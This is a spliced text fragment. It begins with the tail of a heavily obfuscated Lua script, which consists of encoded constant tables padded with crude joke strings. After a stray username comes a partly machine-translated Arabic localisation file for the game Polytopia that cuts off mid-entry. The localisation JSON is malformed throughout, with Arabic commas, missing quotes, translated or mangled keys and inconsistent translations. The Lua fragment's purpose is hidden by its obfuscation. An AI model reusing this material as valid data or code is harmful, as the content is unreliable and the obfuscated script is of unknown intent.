290;end)()}+0)));[(100159671)]=("\99");["PbWozrvBn"]=((596969261));[(774371888)]=("\117");[(425693847)]=((701631341));[((#{798;613;894;520;}+666369644))]=((function(o,l,e,n)e[n]=(((l((o)-((415677-#("psu thighs"))),(14637)))-(347038))-(872100))-((#{(function(...)return 620,789,16,...;end)(705,153,954,975)}+270405));return(e[n]);end));[((149847563-#("imagine being named omer faruk birer bozo")))]=(((742553916-#("gargle my balls"))));[(61679461)]=(((207263329-#("My penis is big ( im lying )"))));Ibp3hBf0=(((368-#("Perth please dm me i need someone to talk to im so lonely"))));["btCD0Ld0E6"]=((103942407));[((#{623;924;(function(...)return 933,847;end)()}+903466405))]=((621252305));["Uv2DvdPtjL"]=((6));["UXdoTN"]=((21));['cN2mXrfEeC']=(((611423056-#("found a can of beans"))));[(260223226)]=(((113-#("It is sad that most meme strings are only at the bottoms of the script"))));[((731329314-#("whos shawn")))]=("\104");[((621594475-#("what")))]=((function(o,e,n,l)n[l]=(e(e(e(o,((286327-#("how do I compile lua into rust please help")))),((#{380;(function(...)return 307,774;end)()}+526299))),(342574)))-(561480);return(n[l]);end));[((742553944-#("gonna spam it <a:trolla:810117626327465996>")))]=("\101");[(762654841)]=((745136053));[(501423379)]=("\37");[(103942407)]=("\103");kW0zoA=((function(o,l,e,n)e[n]=(l((o)-(292545),(631152)))-(233208);return(e[n]);end));['x79X9Yw']=(((964-#("obama sussy balls"))));[(671259666)]=(((286041093-#("never gonna give you up"))));[((258153772-#("perth say sus")))]=(((57-#("perth"))));[(993880799)]=("\112");[(562354862)]=((function(o,e,n,l)n[l]=((e(e(o,((692351-#("This script was obfuscated using lua")))),((245004-#("perth falls down stairs 24 7")))))-((#{539;81;381;}+93769)))-((#{}+737234));return(n[l]);end));[(148932288)]=(((13-#("ok to what"))));[((772940945-#("Never gonna give up")))]=((396277000));[(777371616)]=(((#{607;762;(function(...)return...;end)()}+774371886)));XgxDP=(((846000601-#("My creamy nuts are on top"))));[((#{}+662665299))]=("\121");[(828048030)]=(((#{844;42;(function(...)return 478,137;end)()}+244)));[(262668696)]=((276232852));omlHrPOTj=("\58");[((756317809-#("prezt is gay")))]=("\98");["WqUY0Z5g"]=((253917821));[(353214665)]=((31));["dd5ryo"]=(((376229838-#("bro"))));["Utp3sr"]=((function(o,e,l,n)l[n]=e(e(e(((o)-((987433-#("ok well"))))-(836244),((963415-#("yo wassup")))),(237210)),(924801));return(l[n]);end));}),...)})do return e end;
mahdimouss
{ "اللغة الإنجليزية"، "startmenu.new_game": "لعبة جديدة" ، "startmenu.multiplayer": "MULTIPLAYER" ، "startmenu.resume_game": "استئناف اللعبة" ، "startmenu.settings": "الإعدادات"، "startmenu.high_score": "High Score"، "startmenu.throne_room": "Throne Room"، "startmenu.about": "حول"، "news.title": "أخبار بوليتوبيا"، "news.description": "مرحبًا! \ n هذا هو المكان الذي نشارك فيه آخر الأخبار من عالم Polytopia. ترقبوا!"، "gamemodepicker.title": "GAME MODE"، "tribepicker.title": "اختر قبلتك" ، "tribepicker.categories.humantribes": "القبائل العادية" ، "tribepicker.categories.specialtribes": "القبائل الخاصة" ، "tribepicker.categories.specialtribes.description": "مجموعة من القبائل التي هي خارج هذا العالم قليلاً ..."، "tribepicker.categories.random": "دع المصير يقرر!" ، "tribepicker.categories.random.button": "القبيلة العشوائية" ، "tribepicker.categories.random.selected.title": "Alakazam!"، "tribepicker.categories.random.selected.text": "تم اختيار القبيلة العشوائية"، "tribepicker.restore": "استعادة المشتريات"، "tribepicker.restoring": "استعادة ..."، "tribepicker.reset": "إعادة تعيين المشتريات"، "tribepicker.tba": "TBA"، "tribepicker.underconstruction": "قيد الإنشاء" ، "tribepicker.underconstruction.description": "ما زلنا نعمل على ابتكار هذه القبيلة. زراعة الفاكهة وتطوير اللغات والعمارة. هذا يستغرق وقتًا كما تعلم. تابعMidjiwan على Instagram أو Twitter وستكون أول من يعرف متى القبائل الجديدة يصل!"، "tribepicker.freetribe": "Free Tribe" ، "tribepicker.freetribe.description": "هذه القبيلة متاحة مجانًا ولا يمكن شراؤها لتمكين اللاعبين المتعددين عبر الإنترنت."، "tribepicker.taken": "مأخوذة"، "tribepicker.enable": "تمكين" ، "tribepicker.disable": "تعطيل"، "tribepicker.disabled": "معطل"، "tribepicker.disabled.description": "القبيلة معطلة ، لا يمكن استخدامها من قبلك أو من قبل منظمة العفو الدولية."، "tribepicker.pick": "PICK"، "tribepicker.yourname": "اسمك" ، "tribepicker.anonymous": "مجهول"، "tribepicker.firstplayer": "يجب أن يكون اللاعب الأول إنسانًا" ، "tribepicker.pickyour": "اختر قبيلتك" ، "tribepicker.playertype": "نوع اللاعب"، "tribepicker.news.readmore": "قراءة المزيد ..."، "tribepicker.toprating": "أعلى تقييم {0}٪"، "tribepicker.toprating.next": "{0}٪ مطلوب للنجم التالي"، "tribepicker.topscore": "أعلى نتيجة {0}"، "tribepicker.topscore.next": "{0} للنجمة التالية"، "tribepicker.players": "{0} players"، "tribepicker.mapsize": "حجم الخريطة: {0} مربعات"، "tribepicker.gamemode": "وضع اللعبة: {0}"، "gamesettings.title": "إعداد اللعبة"، "gamesettings.yourname": "اسمك" ، "gamesettings.anonymous": "مجهول"، "gamesettings.gamename": "اسم اللعبة"، "gamesettings.game": "اللعبة {0}"، "gamesettings.players": "اللاعبون"، "gamesettings.opponents": "المعارضون" ، "gamesettings.unlockmore": "افتح قفل المزيد من القبائل لتلعب مع المزيد من الخصوم" ، "gamesettings.notavailable": "غير متوفر" ، "gamesettings.info.multiplayer": "{0} اللاعبون ، {1} خريطة المربعات" ، "gamesettings.info.local": "{0} المعارضون ، {1} خريطة المربعات" ، "gamesettings.info.turnlimit30": "، 30 turn limit"، "gamesettings.info.difficulty.bonus": "مكافأة الصعوبة: {0}٪"، "gamesettings.difficulty": "صعوبة"، "gamesettings.difficulty.easy": "سهل"، "gamesettings.difficulty.normal": "عادي"، "gamesettings.difficulty.hard": "صعب" ، "gamesettings.difficulty.crazy": "مجنون" ، "gamesettings.startgame": "START GAME" ، "gamesettings.creatingworld": "CREATING WORLD" ، "gamesettings.mode": "Game Mode"، "gamesettings.createslot": "إنشاء فتحة لعبة ..."، "gamesettings.createslot.error": "خطأ في إنشاء اللعبة" ، "gamesettings.createslot.error.info": "تأكد من اتصالك بالإنترنت وحاول مرة أخرى."، "gamesettings.size": "حجم الخريطة"، "gamesettings.size.tiny": "صغيرة" ، "gamesettings.size.normal": "عادي"، "gamesettings.size.large": "كبير" ، "gamesettings.size.disabled": "غير متوفر"، "gamesettings.network": "الشبكة"، "gamesettings.network.online": "عبر الإنترنت" ، "gamesettings.network.passplay": "Pass & Play"، "gamesettings.online.disabled": "الإنترنت مغلق" ، "gamesettings.online.disabled.info": "هناك بعض الأشياء التي تحتاج إلى إصلاحها للعب متعددة اللاعبين عبر الإنترنت" ، "gamesettings.online.info": "العب مع أصدقائك عبر الإنترنت باستخدام خادمنا المتعدد اللاعبين."، "gamesettings.passplay.info": "العب مع أصدقائك في وضع عدم الاتصال على هذا الجهاز عن طريق تمريره."، "gamesettings.size.tiles": "{0} خريطة المربعات."، "gamesettings.continue": "متابعة"، "gamemode.perfection.caps": "الكمال" ، "gamemode.perfection": "الكمال" ، "gamemode.perfection.description.button": "أظهر مهاراتك على النقطة العالمية في اللعبة الكلاسيكية 30 دورة." ، "gamemode.perfection.description": "احصل على أعلى درجة ممكنة قبل نفاد الوقت."، "gamemode.perfection.win": "لقد وصلنا إلى نهاية الزمن. ذكرى قبيلتك سوف يتردد صداها في الأبدية!" ، "gamemode.perfection.loss": "لقد وصلنا إلى نهاية الوقت."، "gamemode.domination.caps": "DOMINATION"، "gamemode.domination": "الهيمنة" ، "gamemode.domination.description.button": "العب حتى تبقى قبيلة واحدة فقط ، بدون حد زمني."، "gamemode.domination.description": "امسح كل القبائل الأخرى من على وجه المربع. يمكن أن يكون هناك قبيلة واحدة فقط."، "gamemode.domination.win": "لقد هزمت كل القبائل الأخرى ووحدت الساحة بأكملها!" ، "gamemode.domination.loss": "فقدت مدينتك الأخيرة ، لقد هُزمت."، "gamemode.glory.caps": "GLORY" ، "gamemode.glory": "Glory"، "gamemode.glory.description": "أول من يفوز بـ {0} نقطة"، "gamemode.glory.win": "تم الوصول إلى مجموع النقاط البالغ {0}!" ، "gamemode.might.caps": "MIGHT"، "gamemode.might": "ربما"، "gamemode.might.description": "التقط كل الأحرف الكبيرة للفوز" ، "gamemode.might.win": "تم التقاط جميع الأحرف الكبيرة" ، "gamemode.death": "فقدت مدينتك الأخيرة ، لقد هُزمت."، "world.intro.title": "القائد العظيم!"، "world.intro.text": "لقد تم اختيارك لحكم قبيلة {0}. استكشف العالم ووسع إمبراطوريتك ، لكن احترس من القبائل الأخرى."، "world.intro.objective": "الهدف: {0}"، "world.turn.end": "End Turn"، "world.turn.end.question": "إنهاء دورك؟" ، "world.turn.end.confirm": "تأكيد" ، "world.turn.next": "المنعطف التالي" ، "world.turn.finish": "إنهاء اللعبة" ، "world.turn.nomoves": "لا مزيد من الحركات المتاحة ، انعطاف النهاية" ، "world.turn.start": "START" ، "world.turn.exit": "خروج" ، "world.turn.waiting": "في انتظار {0} للتشغيل ..."، "world.turn.waiting.unknown": "انتظار لعب قبيلة غير معروفة ..."، "world.turn.ready": انقر على حفظ عندما تكون جاهزًا ، "world.turn.your": "دورك" ، "world.turn.remaining": "{0} يتجه لليسار" ، "world.turn.last": "آخر منعطف!"، "world.turn.replaying": "إعادة تشغيل ..."، "world.unit.info.from": "من مدينة {0}."، "world.unit.veteran": "هذه الوحدة مخضرم."، "world.unit.veteran.progress": "{0} / {1} لتصبح متمرسًا."، "world.unit.ability": "قدرة الوحدة"، "world.unit.health": "الصحة" ، "world.unit.attack": "هجوم" ، "world.unit.defence": "دفاع"، "world.unit.movement": "حركة"، "world.unit.range": "Range" ، "world.unit.disembark.title": "اترك {0}" ، "world.unit.disembark.message": "سيؤدي النزول من هذه الوحدة إلى تفكيك {0}. هل ترغب في المتابعة؟"، "world.unit.evolve": "لقد تطورت وحدتك إلى {0}!" ، "world.unit.evolve.title": "نمو الوحدة" ، "world.unit.dissolved": "تم حل وحدتك" ، "world.building.info": "مدينة {0}" ، "world.building.village": "Village"، "world.building.capture.ready": "ستكون جاهزًا لالتقاط المنعطف التالي" ، "world.building.capture.ready.title": "إدخال {0}!"، "world.building.capture.warning": "سيتم الانتهاء من الالتقاط في المنعطف التالي إذا لم توقفهم."، "world.building.capture.warning.title": "{0} تحت الحصار!"، "world.attract.sanctuary": "ملاذك قد جذب حيوانًا بريًا!" ، "world.loading": "تحميل {0}٪"، "world.suggestion.title": "إليك نصيحة!" ، "world.suggestion.message": "يجب {0}" ، "world.suggestion.disable": "(يمكن إيقاف تشغيل هذه الاقتراحات في القائمة)" ، "world.ranks": "الأول والثاني والثالث والرابع والخامس والسادس والسابع والثامن والتاسع والعاشر والحادي عشر والثاني عشر" ، "world.road.connected.title": "طريق التجارة الجديد!"، "world.road.connected.message": "{0} متصل الآن بعاصمتك!"، "world.tech.new.title": "تقنية جديدة!" ، "world.tech.new.message": "لقد اكتشفت سر {0}" ، "world.reward.levelup": "{0} level up!"، "world.reward.building": "يمكنك الآن إنشاء {0}! هذا النصب الملحمي سيجلب الثروة والمجد إلى أقرب مدينة."، "world.reward.building.title": "تم إكمال {0}" ، "world.meet.tribe": "تلتقي {0}" ، "world.task.new": "لقد حصلت على مهمة جديدة!" ، "tribes.nature": "الطبيعة" ، "tribes.xin-xi": "Xin-xi" ، "tribes.xin-xi.info": "يبدأون رحلتهم في الجبال الكثيفة ، محاطة بأزهار الكرز الجميلة. \ n \ n {0} تبدأ اللعبة بتقنية '{1}'."، "tribes.imperius": "Imperius"، "tribes.imperius.info": "جبال ضخمة ووديان خضراء. المناخ {0} مثالي لزراعة الفاكهة. \ n \ n {0} تبدأ اللعبة بتقنية '{1}'."، "tribes.bardur": "Bardur"، "tribes.bardur.info": "البقاء على قيد الحياة في الشتاء الأبدي القاسي في {0} الغابة ليس بالمهمة السهلة ، ولكن يبدو أن {0} تزدهر هنا. \ n \ n {0} تبدأ اللعبة بـ '{1 }' تقنية."، "tribes.oumaji": "Oumaji" ، "tribes.oumaji.info": "الصحراء المباركة التي لا نهاية لها على ما يبدو هي موطن {0} القبيلة. \ n \ n {0} تبدأ اللعبة بتقنية '{1}'."، "tribes.kickoo": "Kickoo"، "tribes.kickoo.info": "شواطئ رملية بيضاء مع أشجار جوز الهند. وفرة من الفاكهة والأسماك. مرحبًا بك في منزل {0}. \ n \ n {0} ابدأ اللعبة باستخدام تقنية" {1} " . "، "tribes.hoodrick": "Hoodrick" ، "tribes.hoodrick.info": "أوراق الخريف الصفراء لغابات {0} هي مخابئ مثالية لسكانها المميزين الذين يحشوون الفطر. \ n \ n {0} ابدأ اللعبة باستخدام تقنية '{1}'."، "tribes.luxidoor": "Luxidoor"، "tribes. أجود أنواع الحرير الأرجواني. ولكن هل ستنجو خارج أسوار عاصمتهم المحبوبة؟ \ n \ n {0} تبدأ اللعبة برأسمال ضخم محاط بأسوار. "، "tribes.vengir": "Vengir"، "tribes.vengir.info": "تستهجن القبائل الأخرى وتدفعها إلى الأراضي البور غير السارة. هل سيتسامحون مع هذا الظلم أم سينهضون للرد؟ \ n \ n {0} ابدأ اللعبة بـ '{1}' التكنولوجيا ومبارز قوي. "، "tribes.zebasi": "Zebasi" ، "tribes.zebasi.info": "{0} ازدهر في غابات السافانا الدافئة ، وزرع التربة الخصبة لتوفير الغذاء لسكانها الأقوياء. \ n \ n {0} ابدأ اللعبة بتقنية" {1} ". و "tribes.zebasi.news": "يتم استثمار كل أرباح قبيلة الزباسي في مشاريع الطاقة الشمسية."، "tribes.aimo": "Ai-Mo" ، "tribes.aimo.info": "تعيش القبيلة {0} الهادئة والحكيمة في أقسى سلسلة جبال في الميدان وأكثرها رياحًا ، حيث وجدوا السلام الداخلي من خلال التأمل في ضوء المساء الأبدي. \ n \ n {0 } يبدأ اللعبة بتقنية "{1}". "، "tribes.aquarion": "Aquarion" ، "tribes.aquarion.info": "من أعماق المحيطات تظهر حضارة ضائعة منذ زمن طويل! لقد منحهم عزلتهم الشديدة قدرات مائية خاصة غير معروفة للقبائل البشرية الأخرى. \ n \ n {0} لديهم تقنية مختلفة قليلاً شجرة والوصول إلى وحدات السلاحف البرمائية الفريدة التي لا يمكن لأي قبيلة أخرى تدريبها. "، "tribes.quetzali": "Quetzali"، "tribes.quetzali.info": "قبيلة {0} تعبد آلهة الطيور في التربة الحمراء وتعيش في وئام مع التناسق الطبيعي لأدغالها التكعيبية. يُشاهدون عادة يركبون طيورًا ضخمة لا تطير. \ n \ n {0 } يبدأ اللعبة بتقنية "{1}". "، "tribes.elyrion": "riȱŋ"، "tribes.elyrion.info": "الغامض {0} يدافع عن منازلهم في الغابات بسحر ملون وضراوة التنانين التي تنفث النيران! \ n \ n إنهم يعتبرون الطبيعة روحًا مقدسة ولا يمكنهم اصطياد الحيوانات أو قطع الأشجار ، بدلاً من ذلك يبدأون اللعبة باستخدام تقنية Enchantment الفريدة التي يمكنها تحويل الحيوانات العادية إلى وحوش قوية. "، "tribes.yadakk": "يدقق" ، "tribes.yadakk.info": "بدأ {0} كقبيلة بدوية في سهول الخليج القاسية الجميلة. الآن هم تجار الساحة ، ويربطون إمبراطوريتهم بالطرق التجارية الرائعة. \ n \ n {0} تبدأ اللعبة بتقنية "{1}". "، "tribes.polaris": "Polaris"، "tribes.polaris.info": "لقد حوصر {0} في أقاصي التندرا المتجمدة على مدى دهور ، ولكنهم باركهم Gaami المجهول بالقدرة على توسيع تضاريسهم الجليدية غير الطبيعية إلى أبعد مما يسمح به الطقس. \ n \ n مع قوة الزلاجات والماموس ، تم تصميم {0} الصوفي على دفن الساحة في الجليد وتحويل الأرض إلى جنة متجمدة. \ n \ n {0} تبدأ اللعبة بإمكانية تجميد التضاريس المحيطة باستخدام موني. "، "building.capital.owner": "{0} هي عاصمة {1}" ، "building.capital.owner.former": "{0} هي العاصمة السابقة للإمبراطورية {1} ، التي تحتلها حاليًا {2} القوات" ، "building.city.owner": "{0} هي مدينة في {1} الإمبراطورية" ، "building.village.owner": "هذه قرية لا تنتمي إلى أية قبيلة" ، "build.ability.attract": "يجذب حيوانًا بريًا إلى بلاطة غابة قريبة كل 3 دورات" ، "build.produce": "تنتج {0} كل منعطف"، "building.produce.multiply.polaris": "({0} لكل {1} بلاطات مجمدة في العالم)"، "build.produce.multiply2.polaris": "تنتج {0} لكل {1} بلاطات مجمدة في العالم"، "build.produce.multiply": "({0} لكل قريب {1})"، "build.produce.multiply2": "ينتج {0} لكل مكان قريب {1} كل منعطف" ، "build.produce.multiply3": "ينتج {0} لكل قريب {1}"، "build.produce.reward.igned": "ينتج {0} لـ {1}" ، "build.produce.reward": "تنتج {0}"، "build.reward.tech": "يمنحك {0}"، "build.reward.instant": "فورًا يمنحك {0}"، "building.transform": "يحول {0} إلى {1}" ، "building.transform2": "يحول {0} إلى {1} مع {2}" ، "build.resource": "يضيف {0} في المربع المحدد" ، "build.value": "تساوي {0} من النقاط"، "build.ability.embark": "الوحدات التي تتحرك هنا ستتحول إلى قوارب يمكنها التحرك على الماء."، "build.ability.route": "يقوم بإنشاء طرق تجارية عبر {0} إلى أي {1} أخرى داخل دائرة نصف قطرها 5 مربعات."، "build.ability.route.and": "و" ، "build.ability.road": "أنشئ طرقًا لربط المدن بالعاصمة. تحصل المدن المتصلة على 1 من السكان كمكافأة. تمنح الطرق أيضًا مكافأة حركة لجميع الوحدات."، "building.ability.ruin": "خراب من حضارة قديمة ، يمكن أن يحتوي على أشياء ثمينة! اذهب إلى هناك مع وحدة لفحصها."، "build.ability.patina": "{0} تنمو بمرور الوقت ، لذا حاول بناءها في أقرب وقت ممكن."، "build.ability.limited": "يمكنك بناء واحد فقط {0} لكل مدينة."، "build.ability.unique": "يمكن بناء {0} مرة واحدة فقط."، "build.restriction.near": "يجب أن يتم بناؤه بجوار {0}."، "build.restriction.on": "يجب أن يكون على مربع به {0}."، "building.names.city": "المدينة"، "build.names.ruin": "خراب"، "building.names.monument1": "مذبح السلام" ، "building.names.monument2": "برج الحكمة" ، "building.names.monument3": "البازار الكبير" ، "building.names.monument4": "مقبرة الأباطرة" ، "building.names.monument5": "بوابة القوة" ، "building.names.monument6": "Park of Fortune" ، "building.names.monument7": "عين الله" ، "building.names.temple": "Temple"، "building.names.burnforest": "Burn Forest" ، "building.names.road": "Road"، "building.names.customshouse": "مركز الجمارك" ، "building.names.gather": "حصاد الفاكهة" ، "building.names.farm": "مزرعة" ، "building.names.windmill": "Windmill"، "building.names.fishing": "صيد السمك"، "building.names.whalehunting": "صيد الحيتان" ، "building.names.watertemple": "Water Temple" ، "building.names.port": "المنفذ"، "build.names.hunting": "صيد" ، "building.names.clearforest": "مسح مجموعة التفرعات" ، "building.names.lumberhut": "Lumber Hut" ، "building.names.sawmill": "Sawmill"، "building.names.growforest": "Grow Forest" ، "building.names.foresttemple": "Forest Temple" ، "building.names.mountaintemple": "Mountain Temple" ، "building.names.mine": "Mine"، "building.names.forge": "Forge"، "building.names.sanctuary": "Sanctuary"، "building.names.enchant": "حيوان ساحر" ، "building.names.enchant_whale": "Enchant Whale" ، "building.names.ice_bank": "Ice Bank" ، "building.names.iceport": "Outpost"، "building.names.icetemple": "Ice Temple" ، "الوحدة": "الوحدة" ، "unit.info.attack": "هجوم" ، "unit.info.defence": "الدفاع" ، "unit.info.movement": "الحركة"، "unit.info.health": "الصحة" ، "unit.info.range": "النطاق" ، "unit.info.skills": "المهارات"، "unit.names.giant": "العملاق" ، "unit.names.crab": "Crab" ، "unit.names.egg": "Dragon Egg" ، "unit.names.wendy": "Gaami" ، "unit.names.bunny": "الأرنب" ، "unit.names.scout": "Scout" ، "unit.names.boat": "قارب"، "unit.names.warrior": "المحارب" ، "unit.names.rider": "رايدر" ، "unit.names.knight": "Knight" ، "unit.names.defender": "المدافع" ، "unit.names.ship": "سفينة"، "unit.names.battleship": "سفينة حربية" ، "unit.names.catapult": "المنجنيق" ، "unit.names.archer": "رامي" ، "unit.names.priest": "Mind Bender"، "unit.names.swordman": "Swordsman"، "unit.names.amphibian": "البرمائيات" ، "unit.names.tridention": "Tridention" ، "unit.names.dragon": "Baby Dragon" ، "unit.names.dragon_large": "Fire Dragon" ، "unit.names.polytaur": "Polytaur" ، "unit.names.seamonster": "نافالون" ، "unit.names.icemaker": "Mooni" ، "unit.names.battlesled": "Battle Sled" ، "unit.names.fortress": "Ice Fortress"، "unit.names.icearcher": "Ice Archer" ، "قابلية الوحدة": "القدرة"، "unit.abilities.dash": "DASH"، "unit.abilities.escape": "ESCAPE"، "unit.abilities.scout": "SCOUT" ، "unit.abilities.sneak": "SNEAK" ، "unit.abilities.hide": "إخفاء" ، "unit.abilities.build": "BUILD" ، "unit.abilities.persist": "PERSIST" ، "unit.abilities.convert": "CONVERT" ، "unit.abilities.heal": "HEAL"، "unit.abilities.swim": "السباحة" ، "unit.abilities.carry": "CARRY"، "unit.abilities.grow": "GROW"، "unit.abilities.fly": "FLY"، "unit.abilities.splash": "SPLASH"، "unit.abilities.decay": "DECAY"، "unit.abilities.navigate": "NAVIGATE"، "unit.abilities.freeze": "التجميد"، "unit.abilities.freezearea": "منطقة التجميد" ، "unit.abilities.autofreeze": "التجميد التلقائي" ، "unit.abilities.skate": "تزلج" ، "unit.abilities.fortify": "FORTIFY"، "player.abilities.destroy": "تدمير"، "player.abilities.disband": "disband"، "player.abilities.literacy": "محو الأمية"، "player.abilities.glide": "الانزلاق"، "resources.names.fruit": "فاكهة"، "Resource.names.crop": "المحاصيل" ، "Resource.names.fish": "fish"، "Resource.names.whale": "whale"، "Resource.names.game": "wild animal"، "Resource.names.metal": "metal"، "terrain.unknown": "أراضي غير معروفة" ، "terrain.water": "Water"، "terrain.ocean": "المحيط"، "terrain.field": "حقل"، "terrain.forest": "غابة"، "terrain.mountain": "Mountain"، "terrain.ice": "Ice"، "actionbox.building.level": "المستوى {0} / {1}" ، "actionbox.tile.roads": "الطرق"، "actionbox.city": "مدينة {0}"، "actionbox.city.level": "lvl {0}"، "actionbox.village": "Village"، "actionbox.unit.frozen": "Frozen {0}"، "actionbox.unit.kills": "{0} / {1} kills"، "actionbox.unit.veteran": "Veteran"، "actionbox.unit.new": "تدريب جديد {0} {1}"، "actionbox.unit.ability": "قدرة الوحدة"، "actionbox.unit.train": "TRAIN" ، "actionbox.unit.upgrade": "ترقية" ، "actionbox.unit.toomany": "(كثير جدًا)"، "actionbox.unit.toomany.info": "هذه المدينة لا يمكنها دعم أي وحدات أخرى. قم بترقية المدينة للحصول على مساحة أكبر للوحدات."، "actionbox.building.doit": "افعل ذلك" ، "actionbox.building.requiredtech": "أنت بحاجة إلى البحث {0} للقيام بذلك ، انقر على زر" شجرة التكنولوجيا "."، "actionbox.building.techtree": "TECH TREE" ، "actionbox.insufficientfunds": "ليس لديك ما يكفي من النجوم لشراء هذا. انقر على" المنعطف التالي "للحصول على المزيد من النجوم."، "actionbox.confirm": "تأكيد {0}" ، "actionbox.confirm.info": "هل أنت متأكد أنك تريد القيام بذلك؟"، "actionbox.confirm.button": "نعم" ، "tooltip.tile.road": "قم ببناء طريق لربط هذه المدينة بعاصمتك."، "tooltip.tile.choose_unit": "اختر وحدة لإنتاج."، "tooltip.tile.limit": "هذه المدينة لا يمكنها دعم المزيد من الوحدات."، "tooltip.tile.capture.enemy": "مدينتك يتم الاستيلاء عليها من قبل العدو!" ، "tooltip.tile.capture": "هذه المدينة يتم الاستيلاء عليها."، "tooltip.tile.capture.tip": "انقل وحدة هنا للاستيلاء على هذه المدينة!"، "tooltip.tile.produces": "تنتج {0} كل منعطف."، "tooltip.tile.level.polaris": "تجميد {0} المزيد من المربعات للوصول إلى المستوى التالي"، "tooltip.tile.level.next": "المستوى التالي في {0} المنعطفات"، "tooltip.tile.level.max": "وصلت إلى الحد الأقصى" ، "tooltip.tile.sailing": "انقل وحدة هنا لبدء الإبحار!" ، "tooltip.tile.monuments": "المعالم تمنح إمبراطوريتك درجة إضافية!"، "tooltip.tile.ruin": "انقل وحدة هنا وافحص هذه الآثار القديمة."، "tooltip.tile.blocked": "تم حظر هذا المورد بواسطة وحدة معادية"، "tooltip.tile.extract.upgrade": "استخرج هذا المورد لترقية مدينتك"، "tooltip.tile.extract.convert": "يمكن تحويل هذا المورد إلى وحدة"، "tooltip.tile.extract.stars": "استخرج هذا المورد لكسب النجوم فورًا" ، "tooltip.tile.extract.research": "تحتاج إلى البحث {0} لاستخراج هذا المورد" ، "tooltip.tile.outside": "هذا المورد خارج إمبراطوريتك" ، "tooltip.tile.research": "تحتاج إلى البحث {0} لتتمكن من الانتقال إلى هنا" ، "tooltip.tile.explore": "استكشف هذه المنطقة لترى ما تحمله!"، "tooltip.unit.city.capture": "اضغط على" التقاط "لإضافة هذه المدينة إلى إمبراطوريتك" ، "tooltip.unit.city.capture.next": "ستكون هذه المدينة جاهزة لالتقاط المنعطف التالي" ، "tooltip.unit.city.capture.flying": "لا يمكن للوحدات الطائرة الاستيلاء على المدن"، "tooltip.unit.actions.none": "لا توجد إجراءات متبقية. اضغط على" المنعطف التالي "لتحريك هذه الوحدة مرة أخرى." ، "tooltip.unit.actions.move": "انقر فوق علامة زرقاء للتحرك."، "tooltip.unit.actions.attack": "انقر فوق علامة حمراء للهجوم!" ، "tooltip.unit.enemy": "هذا هو العدو!" ، "tooltip.unit.enemy.territory": "هذا العدو في منطقتك!" ، "tooltip.unit.enemy.city": "هذا العدو يستولي على مدينتك!" ، "tooltip.unit.grow.now": "سينمو إلى {0} في نهاية هذا المنعطف!"، "tooltip.unit.grow.later": "سينمو إلى {0} {1} دورة."، "tooltip.unit.decay.now": "ستحل هذه الوحدة في نهاية هذا المنعطف."، "tooltip.unit.decay.later": "ستذوب هذه الوحدة في {0} دورات."، "tooltip.ability.disband": "قم بإزالة أي من الوحدات الخاصة بك واحصل على نصف تكلفتها في المقابل."، "tooltip.ability.destroy": "قم بإزالة أي مبنى داخل حدودك ، وهو أمر رائع لإعادة بناء إمبراطوريتك."، "tooltip.ability.literacy": "خفض سعر جميع التقنيات بنسبة 20٪."، "tooltip.ability.glide": "تحصل جميع الوحدات غير المتزلجة على حركة إضافية عند التحرك على الجليد."، "tooltip.ability.dash": "يمكن لهذه الوحدة الهجوم بعد التحرك إذا كان هناك عدو في النطاق."، "tooltip.ability.convert": "يمكن لهذه الوحدة تحويل عدو إلى قبيلتك من خلال مهاجمتها."، "tooltip.ability.escape": "يمكن لهذه الوحدة التحرك مرة أخرى بعد الهجوم."، "tooltip.ability.persist": "يمكن لهذه الوحدة أن تستمر في الهجوم طالما أنها تقتل ضحاياها تمامًا."، "tooltip.ability.swim": "هذه الوحدة برمائية ويمكن أن تتحرك على الأرض والمياه."، "tooltip.ability.carry": "تحمل هذه الوحدة وحدة أخرى بداخلها."، "tooltip.ability.heal": "يمكن لهذه الوحدة أن تعالج الوحدات المحيطة."، "tooltip.ability.navigate": "يمكن لهذه الوحدة التحرك في أي تضاريس حتى لو لم تكن لديك التقنية اللازمة للانتقال إلى هناك."، "tooltip.ability.fly": "يمكن لهذه الوحدة التحليق فوق أي تضاريس بدون عقوبات أو مكافآت على الحركة."، "tooltip.ability.splash": "تتسبب هذه الوحدة في تلف الوحدات المجاورة عند الهجوم."، "tooltip.ability.grow": "ستنمو هذه الوحدة في النهاية وتصبح شيئًا آخر."، "tooltip.ability.sneak": "يمكن لهذه الوحدة تجاوز وحدات العدو دون توقف."، "tooltip.ability.scout": "هذه الوحدة لها نطاق رؤية مزدوج."، "tooltip.ability.freeze": "تقوم هذه الوحدة بتجميد أعدائها عند مهاجمتهم حتى لا يتمكنوا من التحرك."، "tooltip.ability.freeze_area": "يمكن لهذه الوحدة تجميد البلاط المحيط بما في ذلك أي وحدات معادية."، "tooltip.ability.freeze_auto": "تقوم هذه الوحدة بتجميد أي بلاطات ووحدات محيطة عند الحركة."، "tooltip.ability.skate": "تحصل هذه الوحدة على حركة مزدوجة على بلاطات الجليد ولكن حركتها على الأرض تقتصر على قطعة واحدة ويتم تعطيل جميع القدرات الأخرى."، "tooltip.ability.fortify": "تحصل هذه الوحدة على مكافأة دفاع عند الدفاع في مدنها ، علاوة مضاعفة مع جدار المدينة."، "أزرار.ok": "موافق" ، "أزرار.exit": "خروج" ، "button.save": "حفظ" ، "Button.back": "BACK"، "gameinfo.id": "المعرف: {0}"، "gameinfo.lastmove": "آخر حركة: قبل {0}"، "gameinfo.updated": "تم التحديث: منذ {0}" ، "gameinfo.turn": "Turn: {0}"، "gameinfo.serverversion": "إصدار الخادم: {0}"، "gameinfo.gameover": "انتهت هذه اللعبة ، افتحها لعرض النتيجة النهائية" ، "gameinfo.yourturn": "حان دورك إلى {0}"، "gameinfo.opponentsturn": "Waiting for {0} to {1}"، "gameinfo.start": "ابدأ اللعبة"، "gameinfo.picktribe": "اختيار القبيلة" ، "gameinfo.play": "play"، "gamesaverbinary.unable.to.save": "لم أتمكن من حفظ اللعبة ، تأكد من أن لديك مساحة تخزين كافية على جهازك" ، "gamesaverbinary.unable.to.save.title": "تعذر الحفظ :("، "gamesaverbinary.error.loading.moves": "خطأ في تحميل الحركات" ، "polyplayer.task": "مهمة"، "polyplayer.task.explorer.title": "Explorer" ، "polyplayer.task.explorer.description": "استكشف كل قطعة في هذا العالم المربع" ، "polyplayer.task.war.title": "لا رحمة" ، "polyplayer.task.war.description": "امسح عدوًا" ، "polyplayer.task.pacifist.title": "السلمي"، "polyplayer.task.pacifist.description": "لا تقم بأي هجمات لمدة 5 أدوار"، "polyplayer.task.killer.title": "القاتل"، "polyplayer.task.killer.description": 